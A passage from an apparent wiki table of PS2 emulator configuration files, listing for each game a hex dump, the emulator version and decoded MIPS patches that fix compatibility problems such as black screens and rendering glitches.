fp,0x8(sp)),<br /> 0x17FF0F, 0x708, 0x08 ,0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> 0x17FF19, 0x118, 0x08 ,0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> 0x17FF19, 0x170, 0x08 ,0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> 0x17FF19, 0x1C8, 0x08 ,0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> 0x17FF1A, 0x7FC, 0x08 ,0x0800E003 (jr ra), 0 (nop), 0xF0FFBD27 (addiu sp,-0x10), 0x0800BEAF (sw fp,0x8(sp)),<br /> <br /> 002B666C 01 00 06 24 0x24060001 li a2,0x1<br /> 80 00 08 24 0x24080080 li t0,0x80 <br /> 2D 48 E0 00 0x00E0482D dmove t1,a3<br /> 10 00 0A 24 0x240A0010 li t2,0x10<br /> <br /> config 80 00 08 24 0x24080080 li t0,0x80<br /> 01 00 06 24 0x24060001 li a2,0x1<br /> 80 00 08 24 0x24080080 li t0,0x80<br /> 00 00 06 24 0x24060000 li a2,0x0<br /> |-<br /> | NPED00027 || Deadly Strike ||<br /> 00000000 3D 00 00 00 96 40 00 00 0A 00 00 00 01 00 00 00 =....@..........<br /> 00000010 14 09 1E 00 17 37 01 3C 14 37 01 3C 00 00 00 00 .....7.&lt;.7.&lt;....<br /> 00000020 53 4C 45 53 2D 35 32 39 35 35 SLES-52955<br /> || 16534 (4.20+) ||<br /> 0x3D =&gt; 0x4096 (16534)<br /> 0x0A =&gt; 1 <br /> 0x1E0914, 0x3C013717 li at,0x3717F7D1<br /> 0x3C013714 li at,0x3717F7D1 (proper opcode?)<br /> |-<br /> | NPED00087 || Disneys PK: Out of the Shadows ||<br /> <br /> || || blackscreen<br /> <br /> |-<br /> | NPUD21944 || Doras Big Birthday Adventure ||<br /> 00000000 3D 00 00 00 ED 3F 00 00 0A 00 00 00 0A 00 00 00 =....?..........<br /> 00000010 00 FF 0F 00 00 00 00 00 07 00 40 14 04 FF 0F 00 ..........@.....<br /> 00000020 00 00 00 00 10 00 01 3C 08 FF 0F 00 00 00 00 00 .......&lt;........<br /> 00000030 F0 FF 28 8C 0C FF 0F 00 00 00 00 00 20 01 09 2D ..(......... ..-<br /> 00000040 10 FF 0F 00 00 00 00 00 03 00 20 11 14 FF 0F 00 .......... .....<br /> 00000050 00 00 00 00 01 00 08 25 18 FF 0F 00 00 00 00 00 .......%........<br /> 00000060 F0 FF 28 AC 1C FF 0F 00 00 00 00 00 06 00 02 24 ..(............$<br /> 00000070 20 FF 0F 00 00 00 00 00 08 00 E0 03 90 9B 1E 00 ...............<br /> 00000080 08 00 E0 03 C0 FF 03 08 00 00 00 00 53 4C 55 53 ............SLUS<br /> 00000090 2D 32 31 39 34 34 -21944<br /> || 16365 (4.20+) ||<br /> 0x3D =&gt; 0x3FED (16365)<br /> 0x0A =&gt; 0xA,<br /> 0xFFF00,0,0x14400007 bnez v0,pos_000FFF20<br /> 0xFFF04,0,0x3C010010 lui at,0x0010<br /> 0xFFF08,0,0x8C28FFF0 lw t0,-0x10(at)<br /> 0xFFF0C,0,0x2D090120 sltiu t1,t0,0x0120<br /> 0xFFF10,0,0x11200003 beqz t1,pos_000FFF20<br /> 0xFFF14,0,0x25080001 addiu t0,0x1<br /> 0xFFF18,0,0xAC28FFF0 sw t0,-0x10(at)<br /> 0xFFF1C,0,0x24020006 li v0,0x6<br /> 0xFFF20,0,0x03E00008 jr ra<br /> 0x1E9B90, 0x03E00008 (jr ra), 0x0803FFC0 j pos_000FFF00<br /> |-<br /> | NPJD00005 || Dragon Force ||<br /> 00000000 3D 00 00 00 D6 40 00 00 0A 00 00 00 02 00 00 00 =....@..........<br /> 00000010 B4 41 10 00 1C 00 40 10 F9 FF 40 14 BC 41 10 00 .A....@...@..A..<br /> 00000020 1D 00 02 3C 1A 00 40 10 41 00 00 00 00 00 00 00 ...&lt;..@.A.......<br /> 00000030 53 4C 50 4D 2D 36 35 37 37 38 SLPM-65778<br /> || 16598 (4.20+) ||<br /> 0x3D =&gt; 0x40D6 (16598)<br /> 0x0A =&gt; 2, <br /> 0x1041B4, 0x1040001C beqz v0,pos_00104228<br /> 0x1440FFF9 bnez v0,pos_0010419C<br /> 0x1041BC, 0x3C02001D lui v0,0x001D<br /> 0x1040001A beqz v0,pos_00104228<br /> 0x41 =&gt; (sets some value 1, sync? - speedhack?)<br /> |-<br /> | NPJD00034 || Dynasty Warriors 3 ||<br /> <br /> || || blackscreen<br /> <br /> |-<br /> | NPUD20766 || Fatal Frame II ||<br /> 00000000 3D 00 00 00 AF 42 00 00 21 00 00 00 00 00 00 00 =....B..!.......<br /> 00000010 48 00 00 00 02 00 00 00 9C E6 FF FF 0A 00 00 00 H...............<br /> 00000020 01 00 00 00 1C 70 17 00 41 01 0F 24 61 01 0F 24 .....p..A..$a..$<br /> 00000030 46 00 00 00 0B 00 00 00 01 00 00 00 DD 04 00 00 F...............<br /> 00000040 E8 02 00 00 04 00 00 00 00 42 73 84 00 00 02 FF .........Bs.....<br /> 00000050 00 00 00 00 53 4C 55 53 2D 32 30 37 36 36 ....SLUS-20766 <br /> || 17071 (4.50+) ||<br /> 0x3D =&gt; 0x42AF (17071)<br /> 0x21 =&gt; 0<br /> 0x48 =&gt; 0x2, 0xFFFFE69C<br /> 0x0A =&gt; 1, <br /> 0x17701C, 0x240F0141 (li t7,0x141)<br /> 0x240F0161 (li t7,0x161)<br /> 0x46<br /> 0x0B =&gt; 1<br /> 0x4DD, (sector)<br /> 0x2E8, (offset -&gt; 0x26EADC in iso)<br /> 0x04,<br /> 0x84734200 lh s3,0x4200(v1),<br /> 0xFF020000 sd v0,(t8)<br /> |-<br /> | NPED00052 || God Hand || <br /> 00000000 3D 00 00 00 5F 3F 00 00 41 00 00 00 0A 00 00 00 =..._?..A.......<br /> 00000010 14 00 00 00 A0 FF 0F 00 00 00 00 00 01 00 02 3C ....á .........&lt;<br /> 00000020 A4 FF 0F 00 00 00 00 00 21 20 82 00 A8 FF 0F 00 ñ ......! é.¿ ..<br /> 00000030 00 00 00 00 4D 00 02 24 AC FF 0F 00 00 00 00 00 ....M..$¼ ......<br /> 00000040 0E 00 45 14 B4 FF 0F 00 00 00 00 00 3E 18 06 00 ..E.¦ ......&gt;...<br /> 00000050 B8 FF 0F 00 00 00 00 00 FF 3F 63 38 BC FF 0F 00 © ...... ?c8+ ..<br /> 00000060 00 00 00 00 60 00 02 24 C0 FF 0F 00 00 00 00 00 ....`..$+ ......<br /> 00000070 0A 10 03 00 C4 FF 0F 00 00 00 00 00 00 00 83 8C ....- ........âî<br /> 00000080 C8 FF 0F 00 00 00 00 00 00 00 62 FC CC FF 0F 00 + ........b³¦ ..<br /> 00000090 00 00 00 00 15 00 02 24 D0 FF 0F 00 00 00 00 00 .......$ð ......<br /> 000000A0 08 00 62 FC D4 FF 0F 00 00 00 00 00 10 00 63 24 ..b³È ........c$<br /> 000000B0 D8 FF 0F 00 00 00 00 00 00 00 83 AC DC FF 0F 00 Ï ........â¼_ ..<br /> 000000C0 00 00 00 00 10 00 83 8C E0 FF 0F 00 00 00 00 00 ......âîÓ ......<br /> 000000D0 01 00 63 24 E4 FF 0F 00 00 00 00 00 10 00 83 AC ..c$õ ........â¼<br /> 000000E0 E8 FF 0F 00 00 00 00 00 A6 67 0A 08 90 9E 29 00 Þ ......ªg..É×).<br /> 000000F0 01 00 02 3C E8 FF 03 08 94 9E 29 00 21 20 82 00 ...&lt;Þ ..ö×).! é.<br /> 00000100 00 00 00 00 00 00 00 00 53 4C 45 53 2D 35 34 34 ........SLES-544<br /> 00000110 39 30 90<br /> || 16223 (4.10+) ||<br /> 0x3D =&gt; 0x3F5F (16223)<br /> 0x41 =&gt; (sets some value 1, sync? - speedhack?)<br /> 0x0A =&gt; 0x14<br /> 0xFFFA0,0,0x3C020001 lui v0,0x0001<br /> 0xFFFA4,0,0x00822021 addu a0,v0<br /> 0xFFFA8,0,0x2402004D li v0,0x4D<br /> 0xFFFAC,0,0x1445000E bne v0,a1,pos_000FFFE8<br /> 0xFFFB4,0,0x0006183E dsrl32 v1,a2,0x00<br /> 0xFFFB8,0,0x38633FFF xori v1,0x3FFF<br /> 0xFFFBC,0,0x24020060 li v0,0x60<br /> 0xFFFC0,0,0x0003100A movz v0,zero,v1<br /> 0xFFFC4,0,0x8C830000 lw v1,(a0)<br /> 0xFFFC8,0,0xFC620000 sd v0,(v1)<br /> 0xFFFCC,0,0x24020015 li v0,0x15<br /> 0xFFFD0,0,0xFC620008 sd v0,0x8(v1)<br /> 0xFFFD4,0,0x24630010 addiu v1,0x10<br /> 0xFFFD8,0,0xAC830000 sw v1,(a0)<br /> 0xFFFDC,0,0x8C830010 lw v1,0x10(a0)<br /> 0xFFFE0,0,0x24630001 addiu v1,0x1<br /> 0xFFFE4,0,0xAC830010 sw v1,0x10(a0)<br /> 0xFFFE8,0,0x080A67A6 j pos_00299E98<br /> 0x299E90,0x3C020001 (lui v0,0x0001),0x0803FFE8 j pos_000FFFA0<br /> 0x299E94,0x00822021 (addu a0,v0),0x00000000 nop<br /> |-<br /> | NPUD20712 || Gradius V ||<br /> 00000000 3D 00 00 00 37 3E 00 00 0B 00 00 00 01 00 00 00 =...7&gt;..........<br /> 00000010 D3 05 00 00 10 03 00 00 08 00 00 00 03 E0 00 08 ................<br /> 00000020 00 00 00 00 27 BD FF C0 3C 03 00 4C 41 00 00 00 ....'...&lt;..LA...<br /> 00000030 26 00 00 00 E0 46 30 00 44 5E 30 00 00 00 00 00 &amp;....F0.D^0.....<br /> 00000040 53 4C 55 53 2D 32 30 37 31 32 SLUS-20712 <br /> || 15927 (3.71+) || <br /> 0x3D =&gt; 0x3E37 (15927)<br /> 0x0B =&gt; 1<br /> 0x5D3, (sector)<br /> 0x310, (offset -&gt; 0x2E9B04 in iso)<br /> 0x08, <br /> 03 E0 00 08 jr ra<br /> 00 00 00 00 nop<br /> 27 BD FF C0 addiu sp,-0x40<br /> 3C 03 00 4C lui v1,0x004C<br /> 0x41 =&gt; (sets some value 1, sync? - speedhack?)<br /> 0x26 =&gt; 0x3046E0, 0x0x305E44<br /> |-<br /> | NPUD20552 || Grand Theft Auto - Vice City ||<br /> 00000000 3D 00 00 00 A5 41 00 00 21 00 00 00 01 00 00 00 =....A..!.......<br /> 00000010 0A 00 00 00 0D 00 00 00 A0 FF 0F 00 00 00 00 00 ................<br /> 00000020 17 00 01 24 A4 FF 0F 00 00 00 00 00 08 00 24 14 ...$..........$.<br /> 00000030 AC FF 0F 00 00 00 00 00 10 00 01 3C B0 FF 0F 00 ...........&lt;....<br /> 00000040 00 00 00 00 90 FF 22 8C B4 FF 0F 00 00 00 00 00 ......&quot;.........<br /> 00000050 FF FF 42 24 B8 FF 0F 00 00 00 00 00 05 00 40 1C ..B$..........@.<br /> 00000060 C0 FF 0F 00 00 00 00 00 04 00 02 24 C4 FF 0F 00 ...........$....<br /> 00000070 00 00 00 00 90 FF 22 AC C8 FF 0F 00 00 00 00 00 ......&quot;.........<br /> 00000080 C1 3A 0B 08 CC FF 0F 00 00 00 00 00 D0 FF BD 27 .:.............'<br /> 00000090 D0 FF 0F 00 00 00 00 00 08 00 E0 03 D4 FF 0F 00 ................<br /> 000000A0 00 00 00 00 90 FF 22 AC 00 EB 2C 00 D0 FF BD 27 ......&quot;...,....'<br /> 000000B0 E8 FF 03 08 00 00 00 00 53 4C 55 53 2D 32 30 35 ........SLUS-205<br /> 000000C0 35 32 52<br /> || 16805 (4.30+) ||<br /> 0x3D =&gt; 0x41A5 (16805)<br /> 0x21 =&gt; 1<br /> 0x0A = 0xD<br /> 0xFFFA0,0,0x24010017 li at,0x17<br /> 0xFFFA4,0,0x14240008 bne at,a0,pos_000FFFC8<br /> 0xFFFAC,0,0x3C010010 lui at,0x0010<br /> 0xFFFB0,0,0x8C22FF90 lw v0,-0x70(at)<br /> 0xFFFB4,0,0x2442FFFF addiu v0,-0x1<br /> 0xFFFB8,0,0x1C400005 bgtz v0,pos_000FFFD0<br /> 0xFFFC0,0,0x24020004 li v0,0x4<br /> 0xFFFC4,0,0xAC22FF90 sw v0,-0x70(at)<br /> 0xFFFC8,0,0x080B3AC1 j pos_002CEB04<br /> 0xFFFCC,0,0x27BDFFD0 addiu sp,-0x30<br /> 0xFFFD0,0,0x03E00008 jr ra<br /> 0xFFFD4,0,0xAC22FF90 sw v0,-0x70(at)<br /> 0x2CEB00,0x27BDFFD0 ( addiu sp,-0x30 ),0x0803FFE8 j pos_000FFFA0<br /> 0<br /> |-<br /> | NPED00063 || Grand Theft Auto III ||<br /> 00000000 3D 00 00 00 89 3D 00 00 01 00 00 00 90 97 34 00 =....=........4.<br /> 00000010 10 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00 ....!...........<br /> 00000020 53 4C 45 53 2D 35 30 33 33 30 SLES-50330<br /> || 15753 (3.73+) ||<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x01 =&gt; 0x349790, 0x10<br /> 0x21 =&gt; 1<br /> |-<br /> | NPUD20062 || Grand Theft Auto III ||<br /> 00000000 3D 00 00 00 48 3F 00 00 19 00 00 00 01 00 00 00 =...H?..........<br /> 00000010 40 8B 34 00 0F 00 00 00 21 00 00 00 01 00 00 00 @.4.....!.......<br /> 00000020 0B 00 00 00 01 00 00 00 71 6D 0F 00 EC 04 00 00 ........qm......<br /> 00000030 B0 00 00 00 03 E0 00 08 00 00 00 00 3C 01 00 10 ............&lt;...<br /> 00000040 8C 21 FE F0 14 20 00 25 00 00 00 00 27 BD FF 50 .!... .%....'..P<br /> 00000050 08 0B 64 B9 7F BF 00 50 00 00 00 00 34 02 00 03 ..d....P....4...<br /> 00000060 34 01 00 43 10 81 00 15 34 03 00 00 34 01 00 20 4..C....4...4.. <br /> 00000070 10 81 00 12 34 03 00 01 34 01 00 1F 10 81 00 0F ....4...4.......<br /> 00000080 34 03 00 02 34 01 00 1D 10 81 00 0C 34 03 00 03 4...4.......4...<br /> 00000090 34 02 00 02 34 01 00 39 10 81 00 08 34 03 00 04 4...4..9....4...<br /> 000000A0 34 02 00 01 34 01 00 1A 10 81 00 04 34 03 00 05 4...4.......4...<br /> 000000B0 27 BD FE F0 08 0B 1D 05 7F BF 00 90 3C 01 00 10 '...........&lt;...<br /> 000000C0 00 23 18 21 90 79 FE E0 27 39 00 01 03 22 08 2A .#.!.y..'9...&quot;.*<br /> 000000D0 00 01 C8 0A 13 20 FF F6 A0 79 FE E0 03 E0 00 08 ..... ...y......<br /> 000000E0 00 00 00 00 27 BD FE D0 7F BF 00 B0 7F BE 00 A0 ....'...........<br /> 000000F0 7F B7 00 90 7F B6 00 80 7F B5 00 70 7F B4 00 60 ...........p...`<br /> 00000100 7F B3 00 50 7F B2 00 40 7F B1 00 30 7F B0 00 20 ...P...@...0... <br /> 00000110 E7 B7 00 1C E7 B6 00 18 E7 B5 00 14 E7 B4 00 10 ................<br /> 00000120 27 B7 00 F4 46 00 65 06 E7 AC 00 F0 24 07 00 01 '...F.e.....$...<br /> 00000130 46 00 75 86 27 B0 00 F8 46 00 7D 46 E6 ED 00 00 F.u.'...F.}F....<br /> 00000140 3C 02 C4 7A AE 02 00 00 3C 02 44 7A FF A0 00 00 &lt;..z....&lt;.Dz....<br /> 00000150 44 82 60 00 27 A4 00 F0 46 00 6D C6 27 A5 00 C0 D.`.'...F.m.'...<br /> 00000160 27 A6 01 2C 70 00 46 28 70 00 4E 28 70 00 56 28 '..,p.F(p.N(p.V(<br /> 00000170 70 E0 5E 28 0C 0A A8 34 FF A0 00 08 27 B1 00 C8 p.^(...4....'...<br /> 00000180 C6 20 00 00 3C 02 40 00 44 82 08 00 24 07 00 01 . ..&lt;.@.D...$...<br /> 00000190 3C 02 44 7A 0A 00 00 00 07 00 00 00 40 7D 24 00 &lt;.Dz........@}$.<br /> 000001A0 08 00 E0 03 10 00 01 3C 44 7D 24 00 00 00 00 00 .......&lt;D}$.....<br /> 000001B0 08 00 E0 03 48 7D 24 00 00 00 00 00 F0 FE 22 AC ....H}$.......&quot;.<br /> 000001C0 E0 92 2D 00 50 FF BD 27 1A 2B 0D 08 E4 92 2D 00 ..-.P..'.+....-.<br /> 000001D0 50 00 BF 7F 00 00 00 00 10 74 2C 00 F0 FE BD 27 P........t,....'<br /> 000001E0 22 2B 0D 08 14 74 2C 00 90 00 BF 7F 00 00 00 00 &quot;+...t,.........<br /> 000001F0 00 00 00 00 53 4C 55 53 2D 32 30 30 36 32 ....SLUS-20062 <br /> || 16200 (4.10+) ||<br /> 0x3D =&gt; 0x3F48 (16200)<br /> 0x19 =&gt; (sets some value 1)<br /> 0x01 =&gt; 0x348B40, 0xF<br /> 0x21 =&gt; 1<br /> 0x0B =&gt; 1<br /> 0xF6D71, (sector)<br /> 0x4EC, (offset -&gt; 0x7B6B8CE0 in iso)<br /> 0xB0, <br /> 03 E0 00 08 jr ra<br /> 00 00 00 00 nop<br /> 3C 01 00 10 lui at,0x0010<br /> 8C 21 FE F0 lw at,-0x110(at)<br /> 14 20 00 25 bnez at,+0x98<br /> 00 00 00 00 nop<br /> 27 BD FF 50 addiu sp,-0xB0<br /> 08 0B 64 B9 j +0x22C78<br /> 7F BF 00 50 sq ra,0x50(sp)<br /> 00 00 00 00 nop<br /> 34 02 00 03 li v0,0x3<br /> 34 01 00 43 li at,0x43<br /> 10 81 00 15 beq a0,at,+0x5C<br /> 34 03 00 00 li v1,0x0<br /> 34 01 00 20 li at,0x20<br /> 10 81 00 12 beq a0,at,+0x4C<br /> 34 03 00 01 li v1,0x1<br /> 34 01 00 1F li at,0x1F<br /> 10 81 00 0F beq a0,at,+0x3C<br /> 34 03 00 02 li v1,0x2<br /> 34 01 00 1D li at,0x1D<br /> 10 81 00 0C beq a0,at,+0x2C<br /> 34 03 00 03 li v1,0x3<br /> 34 02 00 02 li v0,0x2<br /> 34 01 00 39 li at,0x39<br /> 10 81 00 08 beq a0,at,+0x24<br /> 34 03 00 04 li v1,0x4<br /> 34 02 00 01 li v0,0x1<br /> 34 01 00 1A li at,0x1A<br /> 10 81 00 04 beq a0,at,+0x14<br /> 34 03 00 05 li v1,0x5<br /> 27 BD FE F0 addiu sp,-0x110<br /> 08 0B 1D 05 j +0x10D54<br /> 7F BF 00 90 sq ra,0x90(sp)<br /> 3C 01 00 10 lui at,0x0010<br /> 00 23 18 21 addu v1,at<br /> 90 79 FE E0 lbu t9,-0x120(v1)<br /> 27 39 00 01 addiu t9,0x1<br /> 03 22 08 2A slt at,t9,v0<br /> 00 01 C8 0A movz t9,zero,at<br /> 13 20 FF F6 beqz t9,-0x24<br /> A0 79 FE E0 sb t9,-0x120(v1)<br /> 03 E0 00 08 jr ra<br /> 00 00 00 00 nop<br /> 27 BD FE D0 addiu sp,-0x130<br /> 7F BF 00 B0 sq ra,0xB0(sp)<br /> 7F BE 00 A0 sq fp,0xA0(sp)<br /> 7F B7 00 90 sq s7,0x90(sp)<br /> 7F B6 00 80 sq s6,0x80(sp)<br /> 7F B5 00 70 sq s5,0x70(sp)<br /> 7F B4 00 60 sq s4,0x60(sp)<br /> 7F B3 00 50 sq s3,0x50(sp)<br /> 7F B2 00 40 sq s2,0x40(sp)<br /> 7F B1 00 30 sq s1,0x30(sp)<br /> 7F B0 00 20 sq s0,0x20(sp)<br /> E7 B7 00 1C swc1 f23,0x1C(sp)<br /> E7 B6 00 18 swc1 f22,0x18(sp)<br /> E7 B5 00 14 swc1 f21,0x14(sp)<br /> E7 B4 00 10 swc1 f20,0x10(sp)<br /> 27 B7 00 F4 addiu s7,sp,0xF4<br /> 46 00 65 06 mov.s f20,f12<br /> E7 AC 00 F0 swc1 f12,0xF0(sp)<br /> 24 07 00 01 li a3,0x1<br /> 46 00 75 86 mov.s f22,f14<br /> 27 B0 00 F8 addiu s0,sp,0xF8<br /> 46 00 7D 46 mov.s f21,f15<br /> E6 ED 00 00 swc1 f13,(s7)<br /> 3C 02 C4 7A lui v0,0xC47A<br /> AE 02 00 00 sw v0,(s0)<br /> 3C 02 44 7A lui v0,0x447A<br /> FF A0 00 00 sd zero,(sp)<br /> 44 82 60 00 mtc1 v0,f12<br /> 27 A4 00 F0 addiu a0,sp,0xF0<br /> 46 00 6D C6 mov.s f23,f13<br /> 27 A5 00 C0 addiu a1,sp,0xC0<br /> 27 A6 01 2C addiu a2,sp,0x12C<br /> 70 00 46 28 paddub t0,zero,zero<br /> 70 00 4E 28 paddub t1,zero,zero<br /> 70 00 56 28 paddub t2,zero,zero<br /> 70 E0 5E 28 paddub t3,a3,zero<br /> 0C 0A A8 34 jal -0xC5C4<br /> FF A0 00 08 sd zero,0x8(sp)<br /> 27 B1 00 C8 addiu s1,sp,0xC8<br /> C6 20 00 00 lwc1 f00,(s1)<br /> 3C 02 40 00 lui v0,0x4000<br /> 44 82 08 00 mtc1 v0,f01<br /> 24 07 00 01 li a3,0x1<br /> 3C 02 44 7A lui v0,0x447A<br /> 0x0A =&gt; 7<br /> 0x247D40, 0x03E00008 (jr ra), 0x3C010010 lui at,0x0010<br /> 0x247D44, 0x00000000 (nop), 0x03E00008 jr ra<br /> 0x247D48, 0x00000000 (nop), 0xAC22FEF0 sw v0,-0x110(at)<br /> 0x2D92E0, 0x27BDFF50 (addiu sp,-0xB0), 0x080D2B1A j pos_0034AC68<br /> 0x2D92E4, 0x7FBF0050 (sq ra,0x50(sp)), 0x00000000 nop<br /> 0x2C7410, 0x27BDFEF0 (addiu sp,-0x110), 0x080D2B22 j pos_0034AC88<br /> 0x2C7414, 0x7FBF0090 (sq ra,0x90(sp)), 0x00000000 nop<br /> |-<br /> | NPED00070 || Grand Theft Auto - San Andreas ||<br /> 00000000 3D 00 00 00 60 40 00 00 0F 00 00 00 B0 45 1E 00 =...`@.......E..<br /> 00000010 08 51 1E 00 40 00 00 00 00 00 00 00 53 4C 45 53 .Q..@.......SLES<br /> 00000020 2D 35 32 39 32 37 -52927<br /> || 16480 (4.20+) ||<br /> 0x3D =&gt; 0x4060 (16480)<br /> 0x0F =&gt; 0x1E45B0, 0x1E5108<br /> 0x40 =&gt; (sets some value 1)<br /> |-<br /> | NPUD20946 || Grand Theft Auto - San Andreas ||<br /> 00000000 3D 00 00 00 60 40 00 00 0F 00 00 00 DC 46 1E 00 =...`@.......F..<br /> 00000010 E8 4A 1E 00 40 00 00 00 00 00 00 00 53 4C 55 53 .J..@.......SLUS<br /> 00000020 2D 32 30 39 34 36 -20946<br /> || 16480 (4.20+) ||<br /> 0x3D =&gt; 0x4060 (16480)<br /> 0x0F =&gt; 0x1E46DC, 0x1E4AE8<br /> 0x40 =&gt; (sets some value 1)<br /> |-<br /> | NPJD00062 || Grandia II ||<br /> <br /> || || texture bugs<br /> <br /> |-<br /> | NPUD21604 || GRIMgRiMoiRe ||<br /> 00000000 3D 00 00 00 12 3D 00 00 15 00 00 00 04 00 00 00 =....=..........<br /> || 15634 (3.70+) ||<br /> 0x3D =&gt; 0x3D12 (15634)<br /> 0x15 =&gt; 4<br /> |-<br /> | NPJD00020 || Katamari Damacy ||<br /> 00000000 3D 00 00 00 46 40 00 00 41 00 00 00 0B 00 00 00 =...F@..A.......<br /> 00000010 01 00 00 00 29 04 00 00 40 00 00 00 04 00 00 00 ....)...@.......<br /> 00000020 00 24 77 68 00 00 00 00 00 00 00 00 53 4C 50 53 .$wh........SLPS<br /> 00000030 2D 32 35 33 36 30 -25360<br /> || 16454 (4.20+)||<br /> 0x3D =&gt; 0x4046 (16454)<br /> 0x41 =&gt; (sets some value 1, sync? - speedhack?)<br /> 0x0B =&gt; 1<br /> 0x429, (sector)<br /> 0x40, (offset -&gt; 0x214834 in iso)<br /> 0x04,<br /> 0x68772400 mfsa t6 , <br /> 0x00000000 nop<br /> |-<br /> | NPUD20847 || La Pucelle: Tactics ||<br /> 00000000 3D 00 00 00 DB 3F 00 00 0A 00 00 00 0B 00 00 00 =....?..........<br /> 00000010 40 FA 0F 00 00 00 00 00 0C 01 0A 3C 44 FA 0F 00 @..........&lt;D...<br /> 00000020 00 00 00 00 04 DE 4A 35 48 FA 0F 00 00 00 00 00 ......J5H.......<br /> 00000030 04 00 45 11 4C FA 0F 00 00 00 00 00 00 00 00 00 ..E.L...........<br /> 00000040 50 FA 0F 00 00 00 00 00 10 00 0A 8E 54 FA 0F 00 P...........T...<br /> 00000050 00 00 00 00 9A E2 04 08 58 FA 0F 00 00 00 00 00 ........X.......<br /> 00000060 14 00 0B 8E 5C FA 0F 00 00 00 00 00 9C E2 04 08 ....\...........<br /> 00000070 60 FA 0F 00 00 00 00 00 00 00 00 00 60 8A 13 00 `...........`...<br /> 00000080 10 00 0A 8E 90 FE 03 08 64 8A 13 00 14 00 0B 8E ........d.......<br /> 00000090 00 00 00 00 00 00 00 00 53 4C 55 53 2D 32 30 38 ........SLUS-208<br /> 000000A0 34 37 47 <br /> || 16347 (4.10+) || fixes blackscreen<br /> 0x3D =&gt; 0x3FDB (16347)<br /> 0x0A =&gt; 0xB<br /> 0xFFA40,0,0x3C0A010C lui t2, 0x010C<br /> 0xFFA44,0,0x354ADE04 ori t2, 0xDE04<br /> 0xFFA48,0,0x11450004 beq t2, a1, 0x000FFA5C<br /> 0xFFA4C,0,0 nop<br /> 0xFFA50,0,0x8E0A0010 lw t2, 0x10(s0)<br /> 0xFFA54,0,0x0804E29A j 0x00138A68<br /> 0xFFA58,0,0x8E0B0014 lw t3, 0x14(s0)<br /> 0xFFA5C,0,0x0804E29C j 0x00138A70<br /> 0xFFA60,0,0 nop<br /> 0x138A60,0x8E0A0010 (lw t2, 0x10(s0)),0x0803FE90 j 0x000FFA40<br /> 0x138A64,0x8E0B0014 (lw t3, 0x14(s0)),0 (nop)<br /> |-<br /> | NPUD20275 || Kessen II ||<br /> 00000000 3D 00 00 00 89 3D 00 00 0B 00 00 00 03 00 00 00 =....=..........<br /> 00000010 10 76 00 00 BC 07 00 00 10 00 00 00 48 43 88 00 .v..........HC..<br /> 00000020 4B E5 21 AC 30 84 80 00 4B E7 2B 3C 4B E5 21 AC K.!.0...K.+&lt;K.!.<br /> 00000030 30 84 80 00 4B E7 2B 3C 48 43 88 00 64 76 00 00 0...K.+&lt;HC..dv..<br /> 00000040 10 05 00 00 0C 00 00 00 4B C0 10 9C 4B C0 18 DC ........K...K...<br /> 00000050 4A 68 03 BE 4A 68 03 BE 4B C0 10 9C 4B C0 18 DC Jh..Jh..K...K...<br /> 00000060 64 76 00 00 C8 06 00 00 0C 00 00 00 4B C0 10 9C dv..........K...<br /> 00000070 4B C0 18 DC 4A 68 03 BE 4A 68 03 BE 4B C0 10 9C K...Jh..Jh..K...<br /> 00000080 4B C0 18 DC 00 00 00 00 53 4C 55 53 2D 32 30 32 K.......SLUS-202<br /> 00000090 37 35 75 <br /> || 15753 (3.73+) || fixes spickey polygon syndrome problems for characters in cutscenes/selection/..<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x0B =&gt; 3<br /> 0x7610, 0x07BC, 0x10, <br /> Patched Bytes:<br /> 0x00884348 00 88 43 48 cfc2 $v1, $17 (cfc2 v1,MACflag)<br /> 0xAC21E54B AC 21 E5 4B cop2 0x1E521AC (vsub.xyzw vf06, vf04, vf05)<br /> 0x00808430 00 80 84 30 andi $a0, 0x8000<br /> 0x3C2BE74B 3C 2B E7 4B cop2 0x1E72B3C (vmove.xyzw, vf07, vf05)<br /> Original Bytes:<br /> 0xAC21E54B AC 21 E5 4B cop2 0x1E521AC (vsub.xyzw vf06, vf04, vf05)<br /> 0x00808430 00 80 84 30 andi $a0, 0x8000<br /> 0x3C2BE74B 3C 2B E7 4B cop2 0x1E72B3C (vmove.xyzw, vf07, vf05)<br /> 0x00884348 00 88 43 48 cfc2 $v1, $17 (cfc2 v1,MACflag)<br /> 0x7664, 0x0510, 0x0C,<br /> Patched Bytes:<br /> 0x9C10C04B 9C 10 C0 4B cop2 0x1C0109C (vmulq.xyz vf02,vf02,Q)<br /> 0xDC18C04B DC 18 C0 4B cop2 0x1C018DC (vmulq.xyz vf03,vf03,Q)<br /> 0xBE03684A BE 03 68 4A cop2 0x6803BE (vrsqrt Q, vf00w, vf08x)<br /> Original Bytes:<br /> 0xBE03684A BE 03 68 4A cop2 0x6803BE (vrsqrt Q, vf00w, vf08x)<br /> 0x9C10C04B 9C 10 C0 4B cop2 0x1C0109C (vmulq.xyz vf02,vf02,Q)<br /> 0xDC18C04B DC 18 C0 4B cop2 0x1C018DC (vmulq.xyz vf03,vf03,Q)<br /> 0x7664, 0x06C8, 0x0C, <br /> Patched Bytes:<br /> 0x9C10C04B 9C 10 C0 4B cop2 0x1C0109C (vmulq.xyz vf02,vf02,Q)<br /> 0xDC18C04B DC 18 C0 4B cop2 0x1C018DC (vmulq.xyz vf03,vf03,Q)<br /> 0xBE03684A BE 03 68 4A cop2 0x6803BE (vrsqrt Q, vf00w, vf08x)<br /> Original Bytes:<br /> 0xBE03684A BE 03 68 4A cop2 0x6803BE (vrsqrt Q, vf00w, vf08x)<br /> 0x9C10C04B 9C 10 C0 4B cop2 0x1C0109C (vmulq.xyz vf02,vf02,Q)<br /> 0xDC18C04B DC 18 C0 4B cop2 0x1C018DC (vmulq.xyz vf03,vf03,Q)<br /> |-<br /> | NPJD00040 || Mana Khemia 2 ||<br /> 00000000 3D 00 00 00 98 41 00 00 1B 00 00 00 15 00 00 00 =....A..........<br /> 00000010 04 00 00 